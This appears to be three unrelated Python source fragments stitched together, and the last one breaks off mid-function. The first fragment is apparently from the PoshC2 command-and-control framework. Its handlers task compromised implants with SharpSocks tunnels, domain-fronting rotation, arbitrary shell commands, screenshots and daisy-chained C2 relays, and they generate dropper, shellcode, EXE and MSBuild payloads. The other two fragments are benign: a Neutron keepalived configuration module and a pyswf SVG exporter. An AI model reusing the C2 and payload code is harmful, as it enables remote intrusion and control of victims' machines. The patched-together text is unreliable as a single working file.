channel = "".join(choice(allchar) for x in range(25))
sharpkey = gen_key().decode("utf-8")
sharpurls = get_sharpurls()
sharpurl = get_first_url(select_item("PayloadCommsHost", "C2Server"), select_item("DomainFrontHeader", "C2Server"))
dfheader = get_first_dfheader(select_item("DomainFrontHeader", "C2Server"))
implant = get_implantdetails(randomuri)
pivot = implant.Pivot
if pivot != "PS":
sharpurl = input("Enter the URL for SharpSocks: ")
print("\nIf using Docker, change the SocksHost to be the IP of the PoshC2 Server not 127.0.0.1:49031")
print("sharpsocks -t latest -s \"-c=%s -k=%s --verbose -l=http://*:%s\"\r" % (channel, sharpkey, SocksHost.split(":")[2]) + Colours.GREEN)
print("\nElse\n")
print("sharpsocks -c=%s -k=%s --verbose -l=%s\r\n" % (channel, sharpkey, SocksHost) + Colours.GREEN)
ri = input("Are you ready to start the SharpSocks in the implant? (Y/n) ")
if ri.lower() == "n":
print("")
if (ri == "") or (ri.lower() == "y"):
taskcmd = "Sharpsocks -Client -Uri %s -Channel %s -Key %s -URLs %s -Insecure -Beacon 1000" % (sharpurl, channel, sharpkey, sharpurls)
if dfheader:
taskcmd += " -DomainFrontURL %s" % dfheader
new_task(taskcmd, user, randomuri)
update_label("SharpSocks", randomuri)
def do_reversedns(user, command, randomuri):
params = re.compile("reversedns ", re.IGNORECASE)
params = params.sub("", command)
new_task("[System.Net.Dns]::GetHostEntry(\"%s\")" % params, user, randomuri)
def do_rotation(user, command, randomuri):
domain = input("Domain or URL in array format: \"https://www.example.com\",\"https://www.example2.com\" ")
domainfront = input("Domain front URL in array format: \"fjdsklfjdskl.cloudfront.net\",\"jobs.azureedge.net\" ")
new_task("set-variable -name rotdf -value %s" % domainfront, user, randomuri)
new_task("set-variable -name rotate -value %s" % domain, user, randomuri)
def do_get_rotation(user, command, randomuri):
new_task("get-variable -name rotdf", user, randomuri)
new_task("get-variable -name rotate", user, randomuri)
def do_shell(user, command, randomuri):
new_task(command, user, randomuri)
def do_get_screenshotmulti(user, command, randomuri):
pwrStatus = get_powerstatusbyrandomuri(randomuri)
if (pwrStatus is not None and pwrStatus[7]):
ri = input("[!] Screen is reported as LOCKED, do you still want to attempt a screenshot? (y/N) ")
if ri.lower() == "n" or ri.lower() == "":
return
new_task(command, user, randomuri)
def do_get_screenshot(user, command, randomuri):
pwrStatus = get_powerstatusbyrandomuri(randomuri)
if (pwrStatus is not None and pwrStatus[7]):
ri = input("[!] Screen is reported as LOCKED, do you still want to attempt a screenshot? (y/N) ")
if ri.lower() == "n" or ri.lower() == "":
return
new_task(command, user, randomuri)
def do_get_powerstatus(user, command, randomuri):
getpowerstatus(randomuri)
def do_loadpowerstatus(user, command, randomuri):
update_label("PSM", randomuri)
new_task(command, user, randomuri)
def do_startdaisy(user, command, randomuri):
check_module_loaded("invoke-daisychain.ps1", randomuri, user)
elevated = input(Colours.GREEN + "Are you elevated? Y/n " + Colours.END)
domain_front = ""
proxy_user = ""
proxy_pass = ""
proxy_url = ""
cred_expiry = ""
if elevated.lower() == "n":
cont = input(Colours.RED + "Daisy from an unelevated context can only bind to localhost, continue? y/N " + Colours.END)
if cont.lower() == "n" or cont == "":
return
bind_ip = "localhost"
else:
bind_ip = input(Colours.GREEN + "Bind IP on the daisy host: " + Colours.END)
bind_port = input(Colours.GREEN + "Bind Port on the daisy host: " + Colours.END)
firstdaisy = input(Colours.GREEN + "Is this the first daisy in the chain? Y/n? " + Colours.END)
default_url = get_first_url(PayloadCommsHost, DomainFrontHeader)
default_df_header = get_first_dfheader(DomainFrontHeader)
if default_df_header == default_url:
default_df_header = None
if firstdaisy.lower() == "y" or firstdaisy == "":
upstream_url = input(Colours.GREEN + f"C2 URL (leave blank for {default_url}): " + Colours.END)
domain_front = input(Colours.GREEN + f"Domain front header (leave blank for {str(default_df_header)}): " + Colours.END)
proxy_user = input(Colours.GREEN + "Proxy user (<domain>\\<username>, leave blank if none): " + Colours.END)
proxy_pass = input(Colours.GREEN + "Proxy password (leave blank if none): " + Colours.END)
proxy_url = input(Colours.GREEN + "Proxy URL (leave blank if none): " + Colours.END)
cred_expiry = input(Colours.GREEN + "Password/Account Expiration Date: .e.g. 15/03/2018: ")
if not upstream_url:
upstream_url = default_url
if not domain_front:
if default_df_header:
domain_front = default_df_header
else:
domain_front = ""
else:
upstream_daisy_host = input(Colours.GREEN + "Upstream daisy server: " + Colours.END)
upstream_daisy_port = input(Colours.GREEN + "Upstream daisy port: " + Colours.END)
upstream_url = f"http://{upstream_daisy_host}:{upstream_daisy_port}"
command = f"invoke-daisychain -daisyserver http://{bind_ip} -port {bind_port} -c2server {upstream_url}"
if domain_front:
command = command + f" -domfront {domain_front}"
if proxy_url:
command = command + f" -proxyurl '{proxy_url}'"
if proxy_user:
command = command + f" -proxyuser '{proxy_user}'"
if proxy_pass:
command = command + f" -proxypassword '{proxy_pass}'"
if elevated.lower() == "y" or elevated == "":
firewall = input(Colours.GREEN + "Add firewall rule? (uses netsh.exe) y/N: ")
if firewall.lower() == "n" or firewall == "":
command = command + " -nofwrule"
else:
print_good("Not elevated so binding to localhost and not adding firewall rule")
command = command + " -localhost"
urls = get_allurls()
command = command + f" -urls '{urls}'"
new_task(command, user, randomuri)
update_label("DaisyHost", randomuri)
createpayloads = input(Colours.GREEN + "Would you like to create payloads for this Daisy Server? Y/n ")
if createpayloads.lower() == "y" or createpayloads == "":
name = input(Colours.GREEN + "Enter a payload name: " + Colours.END)
daisyhost = get_implantdetails(randomuri)
proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
C2 = get_c2server_all()
urlId = new_urldetails(name, f"\"http://{bind_ip}:{bind_port}\"", "\"\"", proxy_url, proxy_user, proxy_pass, cred_expiry)
newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, "%s?d" % get_newimplanturl(), PayloadsDirectory, URLID=urlId, PowerShellProxyCommand=proxynone)
newPayload.PSDropper = (newPayload.PSDropper).replace("$pid;%s" % (upstream_url), "$pid;%s@%s" % (daisyhost.User, daisyhost.Domain))
newPayload.CreateDroppers(name)
newPayload.CreateRaw(name)
newPayload.CreateDlls(name)
newPayload.CreateShellcode(name)
newPayload.CreateEXE(name)
newPayload.CreateMsbuild(name)
print_good("Created new %s daisy payloads" % name)
def do_sharp(user, command, randomuri):
check = input(Colours.RED + "\nDid you mean to run this sharp command in a PS implant? y/N ")
if check.lower() == "y":
new_task(command, user, randomuri)
|
|
# Copyright (C) 2014 eNovance SAS <licensing@enovance.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import errno
import itertools
import os
import netaddr
from neutron_lib import exceptions
from oslo_config import cfg
from oslo_log import log as logging
from neutron._i18n import _, _LE
from neutron.agent.linux import external_process
from neutron.common import constants
from neutron.common import utils as common_utils
VALID_STATES = ['MASTER', 'BACKUP']
VALID_AUTH_TYPES = ['AH', 'PASS']
HA_DEFAULT_PRIORITY = 50
PRIMARY_VIP_RANGE_SIZE = 24
KEEPALIVED_SERVICE_NAME = 'keepalived'
KEEPALIVED_EMAIL_FROM = 'neutron@openstack.local'
KEEPALIVED_ROUTER_ID = 'neutron'
GARP_MASTER_DELAY = 60
LOG = logging.getLogger(__name__)
def get_free_range(parent_range, excluded_ranges, size=PRIMARY_VIP_RANGE_SIZE):
"""Get a free IP range, from parent_range, of the specified size.
:param parent_range: String representing an IP range. E.g: '169.254.0.0/16'
:param excluded_ranges: A list of strings to be excluded from parent_range
:param size: What should be the size of the range returned?
:return: A string representing an IP range
"""
free_cidrs = netaddr.IPSet([parent_range]) - netaddr.IPSet(excluded_ranges)
for cidr in free_cidrs.iter_cidrs():
if cidr.prefixlen <= size:
return '%s/%s' % (cidr.network, size)
raise ValueError(_('Network of size %(size)s, from IP range '
'%(parent_range)s excluding IP ranges '
'%(excluded_ranges)s was not found.') %
{'size': size,
'parent_range': parent_range,
'excluded_ranges': excluded_ranges})
class InvalidInstanceStateException(exceptions.NeutronException):
message = _('Invalid instance state: %(state)s, valid states are: '
'%(valid_states)s')
def __init__(self, **kwargs):
if 'valid_states' not in kwargs:
kwargs['valid_states'] = ', '.join(VALID_STATES)
super(InvalidInstanceStateException, self).__init__(**kwargs)
class InvalidAuthenticationTypeException(exceptions.NeutronException):
message = _('Invalid authentication type: %(auth_type)s, '
'valid types are: %(valid_auth_types)s')
def __init__(self, **kwargs):
if 'valid_auth_types' not in kwargs:
kwargs['valid_auth_types'] = ', '.join(VALID_AUTH_TYPES)
super(InvalidAuthenticationTypeException, self).__init__(**kwargs)
class KeepalivedVipAddress(object):
"""A virtual address entry of a keepalived configuration."""
def __init__(self, ip_address, interface_name, scope=None):
self.ip_address = ip_address
self.interface_name = interface_name
self.scope = scope
def __eq__(self, other):
return (isinstance(other, KeepalivedVipAddress) and
self.ip_address == other.ip_address)
def __str__(self):
return '[%s, %s, %s]' % (self.ip_address,
self.interface_name,
self.scope)
def build_config(self):
result = '%s dev %s' % (self.ip_address, self.interface_name)
if self.scope:
result += ' scope %s' % self.scope
return result
class KeepalivedVirtualRoute(object):
"""A virtual route entry of a keepalived configuration."""
def __init__(self, destination, nexthop, interface_name=None,
scope=None):
self.destination = destination
self.nexthop = nexthop
self.interface_name = interface_name
self.scope = scope
def build_config(self):
output = self.destination
if self.nexthop:
output += ' via %s' % self.nexthop
if self.interface_name:
output += ' dev %s' % self.interface_name
if self.scope:
output += ' scope %s' % self.scope
return output
class KeepalivedInstanceRoutes(object):
def __init__(self):
self.gateway_routes = []
self.extra_routes = []
self.extra_subnets = []
def remove_routes_on_interface(self, interface_name):
self.gateway_routes = [gw_rt for gw_rt in self.gateway_routes
if gw_rt.interface_name != interface_name]
# NOTE(amuller): extra_routes are initialized from the router's
# 'routes' attribute. These routes do not have an interface
# parameter and so cannot be removed via an interface_name lookup.
self.extra_subnets = [route for route in self.extra_subnets if
route.interface_name != interface_name]
@property
def routes(self):
return self.gateway_routes + self.extra_routes + self.extra_subnets
def __len__(self):
return len(self.routes)
def build_config(self):
return itertools.chain([' virtual_routes {'],
(' %s' % route.build_config()
for route in self.routes),
[' }'])
class KeepalivedInstance(object):
"""Instance section of a keepalived configuration."""
def __init__(self, state, interface, vrouter_id, ha_cidrs,
priority=HA_DEFAULT_PRIORITY, advert_int=None,
mcast_src_ip=None, nopreempt=False,
garp_master_delay=GARP_MASTER_DELAY):
self.name = 'VR_%s' % vrouter_id
if state not in VALID_STATES:
raise InvalidInstanceStateException(state=state)
self.state = state
self.interface = interface
self.vrouter_id = vrouter_id
self.priority = priority
self.nopreempt = nopreempt
self.advert_int = advert_int
self.mcast_src_ip = mcast_src_ip
self.garp_master_delay = garp_master_delay
self.track_interfaces = []
self.vips = []
self.virtual_routes = KeepalivedInstanceRoutes()
self.authentication = None
self.primary_vip_range = get_free_range(
parent_range=constants.PRIVATE_CIDR_RANGE,
excluded_ranges=[constants.METADATA_CIDR,
constants.DVR_FIP_LL_CIDR] + ha_cidrs,
size=PRIMARY_VIP_RANGE_SIZE)
def set_authentication(self, auth_type, password):
if auth_type not in VALID_AUTH_TYPES:
raise InvalidAuthenticationTypeException(auth_type=auth_type)
self.authentication = (auth_type, password)
def add_vip(self, ip_cidr, interface_name, scope):
vip = KeepalivedVipAddress(ip_cidr, interface_name, scope)
if vip not in self.vips:
self.vips.append(vip)
else:
LOG.debug('VIP %s already present in %s', vip, self.vips)
def remove_vips_vroutes_by_interface(self, interface_name):
self.vips = [vip for vip in self.vips
if vip.interface_name != interface_name]
self.virtual_routes.remove_routes_on_interface(interface_name)
def remove_vip_by_ip_address(self, ip_address):
self.vips = [vip for vip in self.vips
if vip.ip_address != ip_address]
def get_existing_vip_ip_addresses(self, interface_name):
return [vip.ip_address for vip in self.vips
if vip.interface_name == interface_name]
def _build_track_interface_config(self):
return itertools.chain(
[' track_interface {'],
(' %s' % i for i in self.track_interfaces),
[' }'])
def get_primary_vip(self):
"""Return an address in the primary_vip_range CIDR, with the router's
VRID in the host section.
For example, if primary_vip_range is 169.254.0.0/24, and this router's
VRID is 5, the result is 169.254.0.5. Using the VRID assures that
the primary VIP is consistent amongst HA router instances on different
nodes.
"""
ip = (netaddr.IPNetwork(self.primary_vip_range).network +
self.vrouter_id)
return str(netaddr.IPNetwork('%s/%s' % (ip, PRIMARY_VIP_RANGE_SIZE)))
def _build_vips_config(self):
# NOTE(amuller): The primary VIP must be consistent in order to avoid
# keepalived bugs. Changing the VIP in the 'virtual_ipaddress' and
# SIGHUP'ing keepalived can remove virtual routers, including the
# router's default gateway.
# We solve this by never changing the VIP in the virtual_ipaddress
# section, herein known as the primary VIP.
# The only interface known to exist for HA routers is the HA interface
# (self.interface). We generate an IP on that device and use it as the
# primary VIP. The other VIPs (Internal interfaces IPs, the external
# interface IP and floating IPs) are placed in the
# virtual_ipaddress_excluded section.
primary = KeepalivedVipAddress(self.get_primary_vip(), self.interface)
vips_result = [' virtual_ipaddress {',
' %s' % primary.build_config(),
' }']
if self.vips:
vips_result.extend(
itertools.chain([' virtual_ipaddress_excluded {'],
(' %s' % vip.build_config()
for vip in
sorted(self.vips,
key=lambda vip: vip.ip_address)),
[' }']))
return vips_result
def _build_virtual_routes_config(self):
return itertools.chain([' virtual_routes {'],
(' %s' % route.build_config()
for route in self.virtual_routes),
[' }'])
def build_config(self):
config = ['vrrp_instance %s {' % self.name,
' state %s' % self.state,
' interface %s' % self.interface,
' virtual_router_id %s' % self.vrouter_id,
' priority %s' % self.priority,
' garp_master_delay %s' % self.garp_master_delay]
if self.nopreempt:
config.append(' nopreempt')
if self.advert_int:
config.append(' advert_int %s' % self.advert_int)
if self.authentication:
auth_type, password = self.authentication
authentication = [' authentication {',
' auth_type %s' % auth_type,
' auth_pass %s' % password,
' }']
config.extend(authentication)
if self.mcast_src_ip:
config.append(' mcast_src_ip %s' % self.mcast_src_ip)
if self.track_interfaces:
config.extend(self._build_track_interface_config())
config.extend(self._build_vips_config())
if len(self.virtual_routes):
config.extend(self.virtual_routes.build_config())
config.append('}')
return config
class KeepalivedConf(object):
"""A keepalived configuration."""
def __init__(self):
self.reset()
def reset(self):
self.instances = {}
def add_instance(self, instance):
self.instances[instance.vrouter_id] = instance
def get_instance(self, vrouter_id):
return self.instances.get(vrouter_id)
def build_config(self):
config = ['global_defs {',
' notification_email_from %s' % KEEPALIVED_EMAIL_FROM,
' router_id %s' % KEEPALIVED_ROUTER_ID,
'}'
]
for instance in self.instances.values():
config.extend(instance.build_config())
return config
def get_config_str(self):
"""Generates and returns the keepalived configuration.
:return: Keepalived configuration string.
"""
return '\n'.join(self.build_config())
class KeepalivedManager(object):
"""Wrapper for keepalived.
This wrapper permits to write keepalived config files, to start/restart
keepalived process.
"""
def __init__(self, resource_id, config, process_monitor, conf_path='/tmp',
namespace=None):
self.resource_id = resource_id
self.config = config
self.namespace = namespace
self.process_monitor = process_monitor
self.conf_path = conf_path
def get_conf_dir(self):
confs_dir = os.path.abspath(os.path.normpath(self.conf_path))
conf_dir = os.path.join(confs_dir, self.resource_id)
return conf_dir
def get_full_config_file_path(self, filename, ensure_conf_dir=True):
conf_dir = self.get_conf_dir()
if ensure_conf_dir:
common_utils.ensure_dir(conf_dir)
return os.path.join(conf_dir, filename)
def _output_config_file(self):
config_str = self.config.get_config_str()
config_path = self.get_full_config_file_path('keepalived.conf')
common_utils.replace_file(config_path, config_str)
return config_path
@staticmethod
def _safe_remove_pid_file(pid_file):
try:
os.remove(pid_file)
except OSError as e:
if e.errno != errno.ENOENT:
LOG.error(_LE("Could not delete file %s, keepalived can "
"refuse to start."), pid_file)
def get_vrrp_pid_file_name(self, base_pid_file):
return '%s-vrrp' % base_pid_file
def get_conf_on_disk(self):
config_path = self.get_full_config_file_path('keepalived.conf')
try:
with open(config_path) as conf:
return conf.read()
except (OSError, IOError) as e:
if e.errno != errno.ENOENT:
raise
def spawn(self):
config_path = self._output_config_file()
keepalived_pm = self.get_process()
vrrp_pm = self._get_vrrp_process(
self.get_vrrp_pid_file_name(keepalived_pm.get_pid_file_name()))
keepalived_pm.default_cmd_callback = (
self._get_keepalived_process_callback(vrrp_pm, config_path))
keepalived_pm.enable(reload_cfg=True)
self.process_monitor.register(uuid=self.resource_id,
service_name=KEEPALIVED_SERVICE_NAME,
monitored_process=keepalived_pm)
LOG.debug('Keepalived spawned with config %s', config_path)
def disable(self):
self.process_monitor.unregister(uuid=self.resource_id,
service_name=KEEPALIVED_SERVICE_NAME)
pm = self.get_process()
pm.disable(sig='15')
def get_process(self):
return external_process.ProcessManager(
cfg.CONF,
self.resource_id,
self.namespace,
pids_path=self.conf_path)
def _get_vrrp_process(self, pid_file):
return external_process.ProcessManager(
cfg.CONF,
self.resource_id,
self.namespace,
pid_file=pid_file)
def _get_keepalived_process_callback(self, vrrp_pm, config_path):
def callback(pid_file):
# If keepalived process crashed unexpectedly, the vrrp process
# will be orphan and prevent keepalived process to be spawned.
# A check here will let the l3-agent to kill the orphan process
# and spawn keepalived successfully.
if vrrp_pm.active:
vrrp_pm.disable()
self._safe_remove_pid_file(pid_file)
self._safe_remove_pid_file(self.get_vrrp_pid_file_name(pid_file))
cmd = ['keepalived', '-P',
'-f', config_path,
'-p', pid_file,
'-r', self.get_vrrp_pid_file_name(pid_file)]
return cmd
return callback
|
|
"""
This module defines exporters for the SWF fileformat.
"""
from __future__ import absolute_import
from .consts import *
from .geom import *
from .utils import *
from .data import *
from .tag import *
from .filters import *
from lxml import objectify
from lxml import etree
import base64
from six.moves import map
from six.moves import range
try:
import Image
except ImportError:
from PIL import Image
from io import BytesIO
from six.moves import cStringIO
import math
import re
import copy
import cgi
SVG_VERSION = "1.1"
SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
XLINK_HREF = "{%s}href" % XLINK_NS
NS = {"svg" : SVG_NS, "xlink" : XLINK_NS}
PIXELS_PER_TWIP = 20
EM_SQUARE_LENGTH = 1024
MINIMUM_STROKE_WIDTH = 0.5
CAPS_STYLE = {
0 : 'round',
1 : 'butt',
2 : 'square'
}
JOIN_STYLE = {
0 : 'round',
1 : 'bevel',
2 : 'miter'
}
class DefaultShapeExporter(object):
"""
The default (abstract) Shape exporter class.
All shape exporters should extend this class.
"""
def __init__(self, swf=None, debug=False, force_stroke=False):
self.swf = None
self.debug = debug
self.force_stroke = force_stroke
def begin_bitmap_fill(self, bitmap_id, matrix=None, repeat=False, smooth=False):
pass
def begin_fill(self, color, alpha=1.0):
pass
def begin_gradient_fill(self, type, colors, alphas, ratios,
matrix=None,
spreadMethod=SpreadMethod.PAD,
interpolationMethod=InterpolationMethod.RGB,
focalPointRatio=0.0):
pass
def line_style(self,
thickness=float('nan'), color=0, alpha=1.0,
pixelHinting=False,
scaleMode=LineScaleMode.NORMAL,
startCaps=None, endCaps=None,
joints=None, miterLimit=3.0):
pass
def line_gradient_style(self,
thickness=float('nan'), color=0, alpha=1.0,
pixelHinting=False,
scaleMode=LineScaleMode.NORMAL,
startCaps=None, endCaps=None,
joints=None, miterLimit=3.0,
type = 1, colors = [], alphas = [], ratios = [],
matrix=None,
spreadMethod=SpreadMethod.PAD,
interpolationMethod=InterpolationMethod.RGB,
focalPointRatio=0.0):
pass
def line_bitmap_style(self,
thickness=float('nan'),
pixelHinting=False,
scaleMode=LineScaleMode.NORMAL,
startCaps=None, endCaps=None,
joints=None, miterLimit = 3.0,
bitmap_id=None, matrix=None, repeat=False, smooth=False):
pass
def end_fill(self):
pass
def begin_fills(self):
pass
def end_fills(self):
pass
def begin_lines(self):
pass
def end_lines(self):
pass
def begin_shape(self):
pass
def end_shape(self):
pass
def move_to(self, x, y):
#print "move_to", x, y
pass
def line_to(self, x, y):
#print "line_to", x, y
pass
def curve_to(self, cx, cy, ax, ay):
#print "curve_to", cx, cy, ax, ay
pass
class DefaultSVGShapeExporter(DefaultShapeExporter):
def __init__(self, defs=None):
self.defs = defs
self.current_draw_command = ""
self.path_data = ""
self._e = objectify.ElementMaker(annotate=False,
namespace=SVG_NS, nsmap={None : SVG_NS, "xlink" : XLINK_NS})
super(DefaultSVGShapeExporter, self).__init__()
def move_to(self, x, y):
self.current_draw_command = ""
self.path_data += "M" + \
str(NumberUtils.round_pixels_20(x)) + " " + \
str(NumberUtils.round_pixels_20(y)) + " "
def line_to(self, x, y):
if self.current_draw_command != "L":
self.current_draw_command = "L"
self.path_data += "L"
self.path_data += "" + \
str(NumberUtils.round_pixels_20(x)) + " " + \
str(NumberUtils.round_pixels_20(y)) + " "
def curve_to(self, cx, cy, ax, ay):
if self.current_draw_command != "Q":
self.current_draw_command = "Q"
self.path_data += "Q"
self.path_data += "" + \
str(NumberUtils.round_pixels_20(cx)) + " " + \
str(NumberUtils.round_pixels_20(cy)) + " " + \
str(NumberUtils.round_pixels_20(ax)) + " " + \
str(NumberUtils.round_pixels_20(ay)) + " "
def begin_bitmap_fill(self, bitmap_id, matrix=None, repeat=False, smooth=False):
self.finalize_path()
def begin_fill(self, color, alpha=1.0):
self.finalize_path()
def end_fill(self):
pass
#self.finalize_path()
def begin_fills(self):
pass
def end_fills(self):
self.finalize_path()
def begin_gradient_fill(self, type, colors, alphas, ratios,
matrix=None,
spreadMethod=SpreadMethod.PAD,
interpolationMethod=InterpolationMethod.RGB,
focalPointRatio=0.0):
self.finalize_path()
def line_style(self,
thickness=float('nan'), color=0, alpha=1.0,
pixelHinting=False,
scaleMode=LineScaleMode.NORMAL,
startCaps=None, endCaps=None,
joints=None, miterLimit=3.0):
self.finalize_path()
def end_lines(self):
self.finalize_path()
def end_shape(self):
self.finalize_path()
def finalize_path(self):
self.current_draw_command = ""
self.path_data = ""
class SVGShapeExporter(DefaultSVGShapeExporter):
def __init__(self):
self.path = None
self.num_patterns = 0
self.num_gradients = 0
self._gradients = {}
self._gradient_ids = {}
self.paths = {}
self.fills_ended = False
super(SVGShapeExporter, self).__init__()
def begin_shape(self):
self.g = self._e.g()
def begin_fill(self, color, alpha=1.0):
self.finalize_path()
self.path.set("fill", ColorUtils.to_rgb_string(color))
if alpha < 1.0:
self.path.set("fill-opacity", str(alpha))
elif self.force_stroke:
self.path.set("stroke", ColorUtils.to_rgb_string(color))
self.path.set("stroke-width", "1")
else:
self.path.set("stroke", "none")
def begin_gradient_fill(self, type, colors, alphas, ratios,
matrix=None,
spreadMethod=SpreadMethod.PAD,
interpolationMethod=InterpolationMethod.RGB,
focalPointRatio=0.0):
self.finalize_path()
gradient_id = self.export_gradient(type, colors, alphas, ratios, matrix, spreadMethod, interpolationMethod, focalPointRatio)
self.path.set("stroke", "none")
self.path.set("fill", "url(#%s)" % gradient_id)
def export_gradient(self, type, colors, alphas, ratios,
matrix=None,
spreadMethod=SpreadMethod.PAD,
interpolationMethod=InterpolationMethod.RGB,
focalPointRatio=0.0):
self.num_gradients += 1
gradient_id = "gradient%d" % self.num_gradients
gradient = self._e.linearGradient() if type == GradientType.LINEAR \
else self._e.radialGradient()
gradient.set("gradientUnits", "userSpaceOnUse")
if type == GradientType.LINEAR:
gradient.set("x1", "-819.2")
gradient.set("x2", "819.2")
else:
gradient.set("r", "819.2")
gradient.set("cx", "0")
gradient.set("cy", "0")
if focalPointRatio < 0.0 or focalPointRatio > 0.0:
gradient.set("fx", str(819.2 * focalPointRatio))
gradient.set("fy", "0")
if spreadMethod == SpreadMethod.PAD:
gradient.set("spreadMethod", "pad")
elif spreadMethod == SpreadMethod.REFLECT:
gradient.set("spreadMethod", "reflect")
elif spreadMethod == SpreadMethod.REPEAT:
gradient.set("spreadMethod", "repeat")
if interpolationMethod == InterpolationMethod.LINEAR_RGB:
gradient.set("color-interpolation", "linearRGB")
if matrix is not None:
sm = _swf_matrix_to_svg_matrix(matrix)
gradient.set("gradientTransform", sm);
for i in range(0, len(colors)):
entry = self._e.stop()
offset = ratios[i] / 255.0
entry.set("offset", str(offset))
if colors[i] != 0.0:
entry.set("stop-color", ColorUtils.to_rgb_string(colors[i]))
if alphas[i] != 1.0:
entry.set("stop-opacity", str(alphas[i]))
gradient.append(entry)
# prevent same gradient in <defs />
key = etree.tostring(gradient)
if key in self._gradients:
gradient_id = self._gradient_ids[key]
else:
self._gradients[key] = copy.copy(gradient)
self._gradient_ids[key] = gradient_id
gradient.set("id", gradient_id)
self.defs.append(gradient)
return gradient_id
def export_pattern(self, bitmap_id, matrix, repeat=False, smooth=False):
self.num_patterns += 1
bitmap_id = "c%d" % bitmap_id
e = self.defs.xpath("./svg:image[@id='%s']" % bitmap_id, namespaces=NS)
if len(e) < 1:
raise Exception("SVGShapeExporter::begin_bitmap_fill Could not find bitmap!")
image = e[0]
pattern_id = "pat%d" % (self.num_patterns)
pattern = self._e.pattern()
pattern.set("id", pattern_id)
pattern.set("width", image.get("width"))
pattern.set("height", image.get("height"))
pattern.set("patternUnits", "userSpaceOnUse")
#pattern.set("patternContentUnits", "objectBoundingBox")
if matrix is not None:
pattern.set("patternTransform", _swf_matrix_to_svg_matrix(matrix, True, True, True))
pass
use = self._e.use()
use.set(XLINK_HREF, "#%s" % bitmap_id)
pattern.append(use)
self.defs.append(pattern)
return pattern_id
def begin_bitmap_fill(self, bitmap_id, matrix=None, repeat=False, smooth=False):
self.finalize_path()
pattern_id = self.export_pattern(bitmap_id, matrix, repeat, smooth)
self.path.set("stroke", "none")
self.path.set("fill", "url(#%s)" % pattern_id)
def line_style(self,
thickness=float('nan'), color=0, alpha=1.0,
pixelHinting=False,
scaleMode=LineScaleMode.NORMAL,
startCaps=None, endCaps=None,
joints=None, miterLimit=3.0):
self.finalize_path()
self.path.set("fill", "none")
self.path.set("stroke", ColorUtils.to_rgb_string(color))
thickness = 1 if math.isnan(thickness) else thickness
thickness = MINIMUM_STROKE_WIDTH if thickness < MINIMUM_STROKE_WIDTH else thickness
self.path.set("stroke-width", str(thickness))
if alpha < 1.0:
self.path.set("stroke-opacity", str(alpha))
def line_gradient_style(self,
thickness=float('nan'),
pixelHinting = False,
scaleMode=LineScaleMode.NORMAL,
startCaps=0, endCaps=0,
joints=0, miterLimit=3.0,
type = 1,
colors = [],
alphas = [],
ratios = [],
matrix=None,
spreadMethod=SpreadMethod.PAD,
interpolationMethod=InterpolationMethod.RGB,
focalPointRatio=0.0):
self.finalize_path()
gradient_id = self.export_gradient(type, colors, alphas, ratios, matrix, spreadMethod, interpolationMethod, focalPointRatio)
self.path.set("fill", "none")
self.path.set("stroke-linejoin", JOIN_STYLE[joints])
self.path.set("stroke-linecap", CAPS_STYLE[startCaps])
self.path.set("stroke", "url(#%s)" % gradient_id)
thickness = 1 if math.isnan(thickness) else thickness
thickness = MINIMUM_STROKE_WIDTH if thickness < MINIMUM_STROKE_WIDTH else thickness
self.path.set("stroke-width", str(thickness))
def line_bitmap_style(self,
thickness=float('nan'),
pixelHinting=False,
scaleMode=LineScaleMode.NORMAL,
startCaps=None, endCaps=None,
joints=None, miterLimit = 3.0,
bitmap_id=None, matrix=None, repeat=False, smooth=False):
self.finalize_path()
pattern_id = self.export_pattern(bitmap_id, matrix, repeat, smooth)
self.path.set("fill", "none")
self.path.set("stroke", "url(#%s)" % pattern_id)
self.path.set("stroke-linejoin", JOIN_STYLE[joints])
self.path.set("stroke-linecap", CAPS_STYLE[startCaps])
thickness = 1 if math.isnan(thickness) else thickness
thickness = MINIMUM_STROKE_WIDTH if thickness < MINIMUM_STROKE_WIDTH else thickness
self.path.set("stroke-width", str(thickness))
def begin_fills(self):
self.fills_ended = False
def end_fills(self):
self.finalize_path()
self.fills_ended = True
def finalize_path(self):
if self.path is not None and len(self.path_data) > 0:
self.path_data = self.path_data.rstrip()
self.path.set("d", self.path_data)
self.g.append(self.path)
self.path = self._e.path()
super(SVGShapeExporter, self).finalize_path()
class BaseExporter(object):
def __init__(self, swf=None, shape_exporter=None, force_stroke=False):
self.shape_exporter = SVGShapeExporter() if shape_exporter is None else shape_exporter
self.clip_depth = 0
self.mask_id = None
self.jpegTables = None
self.force_stroke = force_stroke
if swf is not None:
self.export(swf)
def export(self, swf, force_stroke=False):
self.force_stroke = force_stroke
self.export_define_shapes(swf.tags)
self.export_display_list(self.get_display_tags(swf.tags))
def export_define_bits(self, tag):
png_buffer = BytesIO()
image = None
if isinstance(tag, TagDefineBitsJPEG3):
tag.bitmapData.seek(0)
tag.bitmapAlphaData.seek(0, 2)
num_alpha = tag.bitmapAlphaData.tell()
tag.bitmapAlphaData.seek(0)
image = Image.open(tag.bitmapData)
if num_alpha > 0:
image_width = image.size[0]
image_height = image.size[1]
image_data = image.getdata()
image_data_len = len(image_data)
if num_alpha == image_data_len:
buff = ""
for i in range(0, num_alpha):
alpha = ord(tag.bitmapAlphaData.read(1))
rgb = list(image_data[i])
buff += struct.pack("BBBB", rgb[0], rgb[1], rgb[2], alpha)
image = Image.frombytes("RGBA", (image_width, image_height), buff)
elif isinstance(tag, TagDefineBitsJPEG2):
tag.bitmapData.seek(0)
image = Image.open(tag.bitmapData)
else:
tag.bitmapData.seek(0)
if self.jpegTables is not None:
buff = BytesIO()
self.jpegTables.seek(0)
buff.write(self.jpegTables.read())
buff.write(tag.bitmapData.read())
buff.seek(0)
image = Image.open(buff)
else:
image = Image.open(tag.bitmapData)
self.export_image(tag, image)
def export_define_bits_lossless(self, tag):
tag.bitmapData.seek(0)
image = Image.open(tag.bitmapData)
self.export_image(tag, image)
def export_define_sprite(self, tag, parent=None):
